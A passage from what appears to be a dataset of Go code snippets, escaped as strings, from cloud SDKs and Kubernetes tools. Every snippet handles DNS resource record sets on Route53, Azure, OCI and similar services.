s.indexer.GetByKey(s.namespace + \"/\" + name)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif !exists {\n\t\treturn nil, errors.NewNotFound(v1alpha1.Resource(\"dnsrecordset\"), name)\n\t}\n\treturn obj.(*v1alpha1.DnsRecordSet), nil\n}", "func listAllRecordSets(r53 *route53.Route53, id string) (rrsets []*route53.ResourceRecordSet, err error) {\n\treq := route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: &id,\n\t}\n\n\tfor {\n\t\tvar resp *route53.ListResourceRecordSetsOutput\n\t\tresp, err = r53.ListResourceRecordSets(&req)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\trrsets = append(rrsets, resp.ResourceRecordSets...)\n\t\tif *resp.IsTruncated {\n\t\t\treq.StartRecordName = resp.NextRecordName\n\t\t\treq.StartRecordType = resp.NextRecordType\n\t\t\treq.StartRecordIdentifier = resp.NextRecordIdentifier\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// unescape wildcards\n\t//for _, rrset := range rrsets {\n\t//\trrset.Name = aws.String(unescaper.Replace(*rrset.Name))\n\t//}\n\n\treturn\n}", "func (p *AWSProvider) Records(zone string) ([]*endpoint.Endpoint, error) {\n\tendpoints := []*endpoint.Endpoint{}\n\n\tf := func(resp *route53.ListResourceRecordSetsOutput, lastPage bool) (shouldContinue bool) {\n\t\tfor _, r := range resp.ResourceRecordSets {\n\t\t\t// TODO(linki, ownership): Remove once ownership system is in place.\n\t\t\t// See: https://github.com/kubernetes-incubator/external-dns/pull/122/files/74e2c3d3e237411e619aefc5aab694742001cdec#r109863370\n\t\t\tswitch aws.StringValue(r.Type) {\n\t\t\tcase route53.RRTypeA, route53.RRTypeCname, route53.RRTypeTxt:\n\t\t\t\tbreak\n\t\t\tdefault:\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tfor _, rr := range r.ResourceRecords {\n\t\t\t\tendpoints = append(endpoints, endpoint.NewEndpoint(aws.StringValue(r.Name), aws.StringValue(rr.Value), aws.StringValue(r.Type)))\n\t\t\t}\n\n\t\t\tif r.AliasTarget != nil {\n\t\t\t\tendpoints = append(endpoints, endpoint.NewEndpoint(aws.StringValue(r.Name), aws.StringValue(r.AliasTarget.DNSName), \"ALIAS\"))\n\t\t\t}\n\t\t}\n\n\t\treturn true\n\t}\n\n\tparams := &route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: aws.String(expandedHostedZoneID(zone)),\n\t}\n\n\tif err := p.Client.ListResourceRecordSetsPages(params, f); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn endpoints, nil\n}", "func (o *ClusterUninstaller) getMatchingRecordSets(parentRecords, childRecords []*dns.ResourceRecordSet) []*dns.ResourceRecordSet {\n\tmatchingRecordSets := []*dns.ResourceRecordSet{}\n\trecordKey := func(r *dns.ResourceRecordSet) string {\n\t\treturn fmt.Sprintf(\"%s %s\", r.Type, r.Name)\n\t}\n\tchildKeys := sets.NewString()\n\tfor _, record := range childRecords {\n\t\tchildKeys.Insert(recordKey(record))\n\t}\n\tfor _, record := range parentRecords {\n\t\tif childKeys.Has(recordKey(record)) {\n\t\t\tmatchingRecordSets = append(matchingRecordSets, record)\n\t\t}\n\t}\n\treturn matchingRecordSets\n}", "func (o *dnsOp) listRecords(zone dnsprovider.Zone) ([]dnsprovider.ResourceRecordSet, error) {\n\tkey := zone.Name() + \"::\" + zone.ID()\n\n\trrs := o.recordsCache[key]\n\tif rrs == nil {\n\t\trrsProvider, ok := zone.ResourceRecordSets()\n\t\tif !ok {\n\t\t\treturn nil, fmt.Errorf(\"zone does not support resource records %q\", zone.Name())\n\t\t}\n\n\t\tklog.V(2).Infof(\"Querying all dnsprovider records for zone %q\", zone.Name())\n\t\tvar err error\n\t\trrs, err = rrsProvider.List()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"error querying resource records for zone %q: %v\", zone.Name(), err)\n\t\t}\n\n\t\to.recordsCache[key] = rrs\n\t}\n\n\treturn rrs, nil\n}", "func LookupResourceSet(ctx *pulumi.Context, args *LookupResourceSetArgs, opts ...pulumi.InvokeOption) (*LookupResourceSetResult, error) {\n\topts = internal.PkgInvokeDefaultOpts(opts)\n\tvar rv LookupResourceSetResult\n\terr := ctx.Invoke(\"aws-native:route53recoveryreadiness:getResourceSet\", args, &rv, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &rv, nil\n}", "func findRecordsToAdd(configrr *route53Zone, awsrr []*route53.ResourceRecordSet) []*route53.Change {\n\n\tvar diff []*route53.Change\n\tlen1 := len(configrr.ResourceRecordSets)\n\tlen2 := len(awsrr)\n\n\tfor i := 1; i < len1; i++ {\n\t\tvar j int\n\t\tfor j = 0; j < len2; j++ {\n\t\t\t// Find a match, short circuit and go to the next iteration\n\t\t\tif configrr.ResourceRecordSets[i].Name == aws.StringValue(awsrr[j].Name) &&\n\t\t\t\tconfigrr.ResourceRecordSets[i].Type == aws.StringValue(awsrr[j].Type) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif j == len2 {\n\t\t\tchange, err := getChange(\"CREATE\", &configrr.ResourceRecordSets[i])\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"Error getting change will adding recordset %s with error: %s \",\n\t\t\t\t\tconfigrr.ResourceRecordSets[i].Name, err)\n\t\t\t}\n\t\t\tdiff = append(diff, change)\n\t\t}\n\t}\n\n\treturn diff\n}", "func GetPrivateRecordSet(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *PrivateRecordSetState, opts ...pulumi.ResourceOption) (*PrivateRecordSet, error) {\n\tvar resource PrivateRecordSet\n\terr := ctx.ReadResource(\"azure-native:network/v20200101:PrivateRecordSet\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (c *DeviceController) GetRecords(w http.ResponseWriter, r *http.Request) {\n\tvars := mux.Vars(r)\n\tres := r53.GetRecordSets(vars[\"id\"])\n\tc.SendJSON(\n\t\tw,\n\t\tr,\n\t\tres,\n\t\thttp.StatusOK,\n\t)\n}", "func (r Dns_Domain) GetResourceRecords() (resp []datatypes.Dns_Domain_ResourceRecord, err error) {\n\terr = r.Session.DoRequest(\"SoftLayer_Dns_Domain\", \"getResourceRecords\", nil, &r.Options, &resp)\n\treturn\n}", "func (o DatasourceSetPtrOutput) ResourceName() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *DatasourceSet) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.ResourceName\n\t}).(pulumi.StringPtrOutput)\n}", "func (s *dnsRecordSetLister) List(selector labels.Selector) (ret []*v1alpha1.DnsRecordSet, err error) {\n\terr = cache.ListAll(s.indexer, selector, func(m interface{}) {\n\t\tret = append(ret, m.(*v1alpha1.DnsRecordSet))\n\t})\n\treturn ret, err\n}", "func (client ReferenceDataSetsClient) Get(ctx context.Context, resourceGroupName string, environmentName string, referenceDataSetName string) (result ReferenceDataSetResource, err error) {\n\tif tracing.IsEnabled() {\n\t\tctx = tracing.StartSpan(ctx, fqdn+\"/ReferenceDataSetsClient.Get\")\n\t\tdefer func() {\n\t\t\tsc := -1\n\t\t\tif result.Response.Response != nil {\n\t\t\t\tsc = result.Response.Response.StatusCode\n\t\t\t}\n\t\t\ttracing.EndSpan(ctx, sc, err)\n\t\t}()\n\t}\n\treq, err := client.GetPreparer(ctx, resourceGroupName, environmentName, referenceDataSetName)\n\tif err != nil {\n\t\terr = autorest.NewErrorWithError(err, \"timeseriesinsights.ReferenceDataSetsClient\", \"Get\", nil, \"Failure preparing request\")\n\t\treturn\n\t}\n\n\tresp, err := client.GetSender(req)\n\tif err != nil {\n\t\tresult.Response = autorest.Response{Response: resp}\n\t\terr = autorest.NewErrorWithError(err, \"timeseriesinsights.ReferenceDataSetsClient\", \"Get\", resp, \"Failure sending request\")\n\t\treturn\n\t}\n\n\tresult, err = client.GetResponder(resp)\n\tif err != nil {\n\t\terr = autorest.NewErrorWithError(err, \"timeseriesinsights.ReferenceDataSetsClient\", \"Get\", resp, \"Failure responding to request\")\n\t\treturn\n\t}\n\n\treturn\n}", "func findResourceFromResourceName(gvr schema.GroupVersionResource, serverGroupsAndResources []*metav1.APIResourceList) (*metav1.APIResource, error) {\n\tfor _, list := range serverGroupsAndResources {\n\t\tgv, err := schema.ParseGroupVersion(list.GroupVersion)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif gv.Group == gvr.Group && gv.Version == gvr.Version {\n\t\t\tfor _, resource := range list.APIResources {\n\t\t\t\tif resource.Name == gvr.Resource {\n\t\t\t\t\t// if the matched resource has group or version set we don't need to copy from the parent list\n\t\t\t\t\tif resource.Group != \"\" || resource.Version != \"\" {\n\t\t\t\t\t\treturn &resource, nil\n\t\t\t\t\t}\n\t\t\t\t\tresult := resource.DeepCopy()\n\t\t\t\t\tresult.Group = gv.Group\n\t\t\t\t\tresult.Version = gv.Version\n\t\t\t\t\treturn result, nil\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn nil, fmt.Errorf(\"resource %s not found in group %s\", gvr.Resource, gvr.GroupVersion())\n}", "func (s *dnsRecordSetLister) DnsRecordSets(namespace string) DnsRecordSetNamespaceLister {\n\treturn dnsRecordSetNamespaceLister{indexer: s.indexer, namespace: namespace}\n}", "func ProtoToResourceRecordSet(p *dnspb.DnsResourceRecordSet) *dns.ResourceRecordSet {\n\tobj := &dns.ResourceRecordSet{\n\t\tDnsName: dcl.StringOrNil(p.DnsName),\n\t\tDnsType: dcl.StringOrNil(p.DnsType),\n\t\tTtl: dcl.Int64OrNil(p.Ttl),\n\t\tManagedZone: dcl.StringOrNil(p.ManagedZone),\n\t\tProject: dcl.StringOrNil(p.Project),\n\t}\n\tfor _, r := range p.GetTarget() {\n\t\tobj.Target = append(obj.Target, r)\n\t}\n\treturn obj\n}", "func NewRecordSet(v dns.RecordSet) (*RecordSet, error) {\n\tr := RecordSet{}\n\tr.Name = *v.Name\n\tr.Type = strings.Replace(*v.Type, \"Microsoft.Network/dnszones/\", \"\", -1)\n\tr.Mark = \"\"\n\tr.Properties.TTL = int(*(*v.RecordSetProperties).TTL)\n\n\t// r.Properties.Values is empty, need to be initialized.\n\t// I prefer doing so in each switch/case sentence.\n\tswitch r.Type {\n\tcase \"A\":\n\t\tfor _, v := range *v.RecordSetProperties.ARecords {\n\t\t\tr.Properties.Values = append(r.Properties.Values, *v.Ipv4Address)\n\t\t}\n\tcase \"AAAA\":\n\t\tfor _, v := range *v.RecordSetProperties.AaaaRecords {\n\t\t\tr.Properties.Values = append(r.Properties.Values, *v.Ipv6Address)\n\t\t}\n\tcase \"CNAME\":\n\t\tr.Properties.Values = append(r.Properties.Values, *v.RecordSetProperties.CnameRecord.Cname)\n\tcase \"MX\":\n\t\tfor _, v := range *v.RecordSetProperties.MxRecords {\n\t\t\tpref := strconv.FormatInt(int64(*v.Preference), 10)\n\t\t\tr.Properties.Values = append(r.Properties.Values, pref+\" \"+*v.Exchange)\n\t\t}\n\tcase \"NS\":\n\t\tfor _, v := range *v.RecordSetProperties.NsRecords {\n\t\t\t// Append to the golbal variable\n\t\t\tnsrecords = append(nsrecords, *v.Nsdname)\n\t\t}\n\tcase \"TXT\":\n\t\tfor _, v := range *v.RecordSetProperties.TxtRecords {\n\t\t\t// Concat values into one string\n\t\t\ts := \"\"\n\t\t\tfor _, w := range *v.Value {\n\t\t\t\ts += w\n\t\t\t}\n\t\t\tr.Properties.Values = append(r.Properties.Values, s)\n\t\t}\n\tcase \"CAA\":\n\t\tcps := []CaaProperty{}\n\t\tfor _, v := range *v.RecordSetProperties.CaaRecords {\n\t\t\tcp := CaaProperty{\n\t\t\t\tFlags: v.Flags,\n\t\t\t\tTag: *v.Tag,\n\t\t\t\tValue: *v.Value,\n\t\t\t}\n\t\t\tcps = append(cps, cp)\n\t\t}\n\n\t\tr.Properties.CaaProperties = cps\n\tdefault:\n\t\treturn nil, nil\n\t}\n\n\treturn &r, nil\n}", "func (ac *azureClient) CreateOrUpdateRecordSet(ctx context.Context, resourceGroupName string, privateZoneName string, recordType privatedns.RecordType, name string, set privatedns.RecordSet) error {\n\tctx, _, done := tele.StartSpanWithLogger(ctx, \"privatedns.AzureClient.CreateOrUpdateRecordSet\")\n\tdefer done()\n\n\t_, err := ac.recordsets.CreateOrUpdate(ctx, resourceGroupName, privateZoneName, recordType, name, set, \"\", \"\")\n\treturn err\n}", "func (client ReferenceDataSetsClient) GetPreparer(ctx context.Context, resourceGroupName string, environmentName string, referenceDataSetName string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"environmentName\": autorest.Encode(\"path\", environmentName),\n\t\t\"referenceDataSetName\": autorest.Encode(\"path\", referenceDataSetName),\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2020-05-15\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TimeSeriesInsights/environments/{environmentName}/referenceDataSets/{referenceDataSetName}\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func getRequestedResourceNamesSet(discoveryRequest *xds_discovery.DiscoveryRequest) mapset.Set {\n\tresourcesRequested := mapset.NewSet()\n\tfor idx := range discoveryRequest.ResourceNames {\n\t\tresourcesRequested.Add(discoveryRequest.ResourceNames[idx])\n\t}\n\treturn resourcesRequested\n}", "func (in *RecordSetGroup) GetTemplate(client dynamic.Interface) (string, error) {\n\tif client == nil {\n\t\treturn \"\", fmt.Errorf(\"k8s client not loaded for template\")\n\t}\n\ttemplate := cloudformation.NewTemplate()\n\n\ttemplate.Description = \"AWS Controller - route53.RecordSetGroup (ac-{TODO})\"\n\n\ttemplate.Outputs = map[string]interface{}{\n\t\t\"ResourceRef\": map[string]interface{}{\n\t\t\t\"Value\": cloudformation.Ref(\"RecordSetGroup\"),\n\t\t\t\"Export\": map[string]interface{}{\n\t\t\t\t\"Name\": in.Name + \"Ref\",\n\t\t\t},\n\t\t},\n\t}\n\n\troute53RecordSetGroup := &route53.RecordSetGroup{}\n\n\tif in.Spec.Comment != \"\" {\n\t\troute53RecordSetGroup.Comment = in.Spec.Comment\n\t}\n\n\t// TODO(christopherhein) move these to a defaulter\n\troute53RecordSetGroupHostedZoneRefItem := in.Spec.HostedZoneRef.DeepCopy()\n\n\tif route53RecordSetGroupHostedZoneRefItem.ObjectRef.Namespace == \"\" {\n\t\troute53RecordSetGroupHostedZoneRefItem.ObjectRef.Namespace = in.Namespace\n\t}\n\n\tin.Spec.HostedZoneRef = *route53RecordSetGroupHostedZoneRefItem\n\thostedZoneId, err := in.Spec.HostedZoneRef.String(client)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif hostedZoneId != \"\" {\n\t\troute53RecordSetGroup.HostedZoneId = hostedZoneId\n\t}\n\n\tif in.Spec.HostedZoneName != \"\" {\n\t\troute53RecordSetGroup.HostedZoneName = in.Spec.HostedZoneName\n\t}\n\n\troute53RecordSetGroupRecordSets := []route53.RecordSetGroup_RecordSet{}\n\n\tfor _, item := range in.Spec.RecordSets {\n\t\troute53RecordSetGroupRecordSet := route53.RecordSetGroup_RecordSet{}\n\n\t\tif !reflect.DeepEqual(item.AliasTarget, RecordSetGroup_AliasTarget{}) {\n\t\t\troute53RecordSetGroupRecordSetAliasTarget := route53.RecordSetGroup_AliasTarget{}\n\n\t\t\tif item.AliasTarget.DNSName != \"\" {\n\t\t\t\troute53RecordSetGroupRecordSetAliasTarget.DNSName = item.AliasTarget.DNSName\n\t\t\t}\n\n\t\t\tif item.AliasTarget.EvaluateTargetHealth || !item.AliasTarget.EvaluateTargetHealth {\n\t\t\t\troute53RecordSetGroupRecordSetAliasTarget.EvaluateTargetHealth = item.AliasTarget.EvaluateTargetHealth\n\t\t\t}\n\n\t\t\t// TODO(christopherhein) move these to a defaulter\n\t\t\troute53RecordSetGroupRecordSetAliasTargetHostedZoneRefItem := item.AliasTarget.HostedZoneRef.DeepCopy()\n\n\t\t\tif route53RecordSetGroupRecordSetAliasTargetHostedZoneRefItem.ObjectRef.Namespace == \"\" {\n\t\t\t\troute53RecordSetGroupRecordSetAliasTargetHostedZoneRefItem.ObjectRef.Namespace = in.Namespace\n\t\t\t}\n\n\t\t\titem.AliasTarget.HostedZoneRef = *route53RecordSetGroupRecordSetAliasTargetHostedZoneRefItem\n\t\t\thostedZoneId, err := item.AliasTarget.HostedZoneRef.String(client)\n\t\t\tif err != nil {\n\t\t\t\treturn \"\", err\n\t\t\t}\n\n\t\t\tif hostedZoneId != \"\" {\n\t\t\t\troute53RecordSetGroupRecordSetAliasTarget.HostedZoneId = hostedZoneId\n\t\t\t}\n\n\t\t\troute53RecordSetGroupRecordSet.AliasTarget = &route53RecordSetGroupRecordSetAliasTarget\n\t\t}\n\n\t\tif item.Comment != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.Comment = item.Comment\n\t\t}\n\n\t\tif item.Failover != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.Failover = item.Failover\n\t\t}\n\n\t\tif !reflect.DeepEqual(item.GeoLocation, RecordSetGroup_GeoLocation{}) {\n\t\t\troute53RecordSetGroupRecordSetGeoLocation := route53.RecordSetGroup_GeoLocation{}\n\n\t\t\tif item.GeoLocation.ContinentCode != \"\" {\n\t\t\t\troute53RecordSetGroupRecordSetGeoLocation.ContinentCode = item.GeoLocation.ContinentCode\n\t\t\t}\n\n\t\t\tif item.GeoLocation.CountryCode != \"\" {\n\t\t\t\troute53RecordSetGroupRecordSetGeoLocation.CountryCode = item.GeoLocation.CountryCode\n\t\t\t}\n\n\t\t\tif item.GeoLocation.SubdivisionCode != \"\" {\n\t\t\t\troute53RecordSetGroupRecordSetGeoLocation.SubdivisionCode = item.GeoLocation.SubdivisionCode\n\t\t\t}\n\n\t\t\troute53RecordSetGroupRecordSet.GeoLocation = &route53RecordSetGroupRecordSetGeoLocation\n\t\t}\n\n\t\t// TODO(christopherhein) move these to a defaulter\n\t\troute53RecordSetGroupRecordSetHealthCheckRefItem := item.HealthCheckRef.DeepCopy()\n\n\t\tif route53RecordSetGroupRecordSetHealthCheckRefItem.ObjectRef.Namespace == \"\" {\n\t\t\troute53RecordSetGroupRecordSetHealthCheckRefItem.ObjectRef.Namespace = in.Namespace\n\t\t}\n\n\t\titem.HealthCheckRef = *route53RecordSetGroupRecordSetHealthCheckRefItem\n\t\thealthCheckId, err := item.HealthCheckRef.String(client)\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tif healthCheckId != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.HealthCheckId = healthCheckId\n\t\t}\n\n\t\t// TODO(christopherhein) move these to a defaulter\n\t\troute53RecordSetGroupRecordSetHostedZoneRefItem := item.HostedZoneRef.DeepCopy()\n\n\t\tif route53RecordSetGroupRecordSetHostedZoneRefItem.ObjectRef.Namespace == \"\" {\n\t\t\troute53RecordSetGroupRecordSetHostedZoneRefItem.ObjectRef.Namespace = in.Namespace\n\t\t}\n\n\t\titem.HostedZoneRef = *route53RecordSetGroupRecordSetHostedZoneRefItem\n\t\thostedZoneId, err := item.HostedZoneRef.String(client)\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tif hostedZoneId != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.HostedZoneId = hostedZoneId\n\t\t}\n\n\t\tif item.HostedZoneName != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.HostedZoneName = item.HostedZoneName\n\t\t}\n\n\t\tif item.MultiValueAnswer || !item.MultiValueAnswer {\n\t\t\troute53RecordSetGroupRecordSet.MultiValueAnswer = item.MultiValueAnswer\n\t\t}\n\n\t\tif item.Name != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.Name = item.Name\n\t\t}\n\n\t\tif item.Region != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.Region = item.Region\n\t\t}\n\n\t\tif len(item.ResourceRecords) > 0 {\n\t\t\troute53RecordSetGroupRecordSet.ResourceRecords = item.ResourceRecords\n\t\t}\n\n\t\tif item.SetIdentifier != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.SetIdentifier = item.SetIdentifier\n\t\t}\n\n\t\tif item.TTL != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.TTL = item.TTL\n\t\t}\n\n\t\tif item.Type != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.Type = item.Type\n\t\t}\n\n\t\tif item.Weight != route53RecordSetGroupRecordSet.Weight {\n\t\t\troute53RecordSetGroupRecordSet.Weight = item.Weight\n\t\t}\n\n\t}\n\n\tif len(route53RecordSetGroupRecordSets) > 0 {\n\t\troute53RecordSetGroup.RecordSets = route53RecordSetGroupRecordSets\n\t}\n\n\ttemplate.Resources = map[string]cloudformation.Resource{\n\t\t\"RecordSetGroup\": route53RecordSetGroup,\n\t}\n\n\t// json, err := template.JSONWithOptions(&intrinsics.ProcessorOptions{NoEvaluateConditions: true})\n\tjson, err := template.JSON()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn string(json), nil\n}", "func (o DatasourceSetResponseOutput) ResourceName() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v DatasourceSetResponse) *string { return v.ResourceName }).(pulumi.StringPtrOutput)\n}", "func createResourceRecordSetChange(svc *route53.Route53, zone string, changes []*route53.Change) error {\n\tparams := &route53.ChangeResourceRecordSetsInput{\n\t\tChangeBatch: &route53.ChangeBatch{ // Required\n\t\t\tChanges: changes,\n\t\t\tComment: aws.String(\"Zone Changes\"),\n\t\t},\n\t\tHostedZoneId: aws.String(zone), // Required\n\t}\n\tresp, err := svc.ChangeResourceRecordSets(params)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Pretty-print the response data.\n\tfmt.Println(\"Changes Submitted to AWS:\")\n\tfmt.Printf(\"Comment: %s \\n\", aws.StringValue(resp.ChangeInfo.Comment))\n\tfmt.Printf(\"ID: %s \\n\", aws.StringValue(resp.ChangeInfo.Id))\n\tfmt.Printf(\"Status: %s \\n\", aws.StringValue(resp.ChangeInfo.Status))\n\tfmt.Printf(\"Submitted At: %s \\n\", aws.TimeValue(resp.ChangeInfo.SubmittedAt))\n\treturn nil\n}", "func filterRecords(resourceRecordSet []*route53.ResourceRecordSet, domain string) []*route53.ResourceRecordSet {\n\tvar result []*route53.ResourceRecordSet\n\tfor i := 0; i < len(resourceRecordSet); i++ {\n\t\tif *resourceRecordSet[i].Type == \"A\" && isValidRecord(*resourceRecordSet[i].Name, domain) {\n\t\t\tresult = append(result, resourceRecordSet[i])\n\t\t}\n\t}\n\treturn result\n}", "func (o LookupResourceSetResultOutput) Resources() ResourceSetResourceArrayOutput {\n\treturn o.ApplyT(func(v LookupResourceSetResult) []ResourceSetResource { return v.Resources }).(ResourceSetResourceArrayOutput)\n}", "func (client DnsClient) GetRRSet(ctx context.Context, request GetRRSetRequest) (response GetRRSetResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.getRRSet, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = GetRRSetResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = GetRRSetResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(GetRRSetResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into GetRRSetResponse\")\n\t}\n\treturn\n}", "func (s *FastDNSv2Service) CreateRecordSet(ctx context.Context, rs *RecordSetCreateRequest) (*RecordSet, *Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/zones/%v/names/%v/types/%v\", rs.Zone, rs.Name, rs.Type)\n\n\treq, err := s.client.NewRequest(\"POST\", u, rs)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar r *RecordSet\n\tresp, err := s.client.Do(ctx, req, &r)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn r, resp, nil\n}", "func (c *DeviceController) UpdateRecordSet(w http.ResponseWriter, r *http.Request) {\n\tvar rs r53.RecordSet\n\tif r.Body == nil {\n\t\thttp.Error(w, \"Please send a request body\", 400)\n\t\treturn\n\t}\n\terr := json.NewDecoder(r.Body).Decode(&rs)\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), 400)\n\t\treturn\n\t}\n\tprintln(rs.HostedZoneId)\n\tres := r53.UpdateRecordSet(rs)\n\tc.SendJSON(\n\t\tw,\n\t\tr,\n\t\tres,\n\t\thttp.StatusOK,\n\t)\n}", "func (o DatasourceSetResponsePtrOutput) ResourceName() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *DatasourceSetResponse) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.ResourceName\n\t}).(pulumi.StringPtrOutput)\n}", "func (s UserSet) GetRecord(externalID string) m.UserSet {\n\tres := s.Collection().Call(\"GetRecord\", externalID)\n\tresTyped := res.(models.RecordSet).Collection().Wrap(\"User\").(m.UserSet)\n\treturn resTyped\n}", "func (client *RecordSetsClient) getHandleResponse(resp *azcore.Response) (RecordSetResponse, error) {\n\tvar val *RecordSet\n\tif err := resp.UnmarshalAsJSON(&val); err != nil {\n\t\treturn RecordSetResponse{}, err\n\t}\n\treturn RecordSetResponse{RawResponse: resp.Response, RecordSet: val}, nil\n}", "func NewDnsRecordSetLister(indexer cache.Indexer) DnsRecordSetLister {\n\treturn &dnsRecordSetLister{indexer: indexer}\n}", "func (client DnsClient) updateRRSet(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodPut, \"/zones/{zoneNameOrId}/records/{domain}/{rtype}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response UpdateRRSetResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (o ResourceRecordSetOutput) Rrdatas() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v *ResourceRecordSet) pulumi.StringArrayOutput { return v.Rrdatas }).(pulumi.StringArrayOutput)\n}", "func (d *DNSController) ensureDNSRrsets(dnsZone dnsprovider.Zone, dnsName string, endpoints []string, uplevelCname string) error {\n\trrsets, supported := dnsZone.ResourceRecordSets()\n\tif !supported {\n\t\treturn fmt.Errorf(\"Failed to ensure DNS records for %s. DNS provider does not support the ResourceRecordSets interface\", dnsName)\n\t}\n\trrsetList, err := rrsets.Get(dnsName)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif len(rrsetList) == 0 {\n\t\tglog.V(4).Infof(\"No recordsets found for DNS name %q. Need to add either A records (if we have healthy endpoints), or a CNAME record to %q\", dnsName, uplevelCname)\n\t\tif len(endpoints) < 1 {\n\t\t\tglog.V(4).Infof(\"There are no healthy endpoint addresses at level %q, so CNAME to %q, if provided\", dnsName, uplevelCname)\n\t\t\tif uplevelCname != \"\" {\n\t\t\t\tglog.V(4).Infof(\"Creating CNAME to %q for %q\", uplevelCname, dnsName)\n\t\t\t\tnewRrset := rrsets.New(dnsName, []string{uplevelCname}, minDNSTTL, rrstype.CNAME)\n\t\t\t\tglog.V(4).Infof(\"Adding recordset %v\", newRrset)\n\t\t\t\terr = rrsets.StartChangeset().Add(newRrset).Apply()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tglog.V(4).Infof(\"Successfully created CNAME to %q for %q\", uplevelCname, dnsName)\n\t\t\t} else {\n\t\t\t\tglog.V(4).Infof(\"We want no record for %q, and we have no record, so we're all good.\", dnsName)\n\t\t\t}\n\t\t} else {\n\t\t\t// We have valid endpoint addresses, so just add them as A records.\n\t\t\t// But first resolve DNS names, as some cloud providers (like AWS) expose\n\t\t\t// load balancers behind DNS names, not IP addresses.\n\t\t\tglog.V(4).Infof(\"We have valid endpoint addresses %v at level %q, so add them as A records, after resolving DNS names\", endpoints, dnsName)\n\t\t\t// Resolve DNS through network\n\t\t\tresolvedEndpoints, err := getResolvedEndpoints(endpoints, d.netWrapper)\n\t\t\tif err != nil {\n\t\t\t\treturn err // TODO: We could potentially add the ones we did get back, even if some of them failed to resolve.\n\t\t\t}\n\n\t\t\tnewRrset := rrsets.New(dnsName, resolvedEndpoints, minDNSTTL, rrstype.A)\n\t\t\tglog.V(4).Infof(\"Adding recordset %v\", newRrset)\n\t\t\terr = rrsets.StartChangeset().Add(newRrset).Apply()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tglog.V(4).Infof(\"Successfully added recordset %v\", 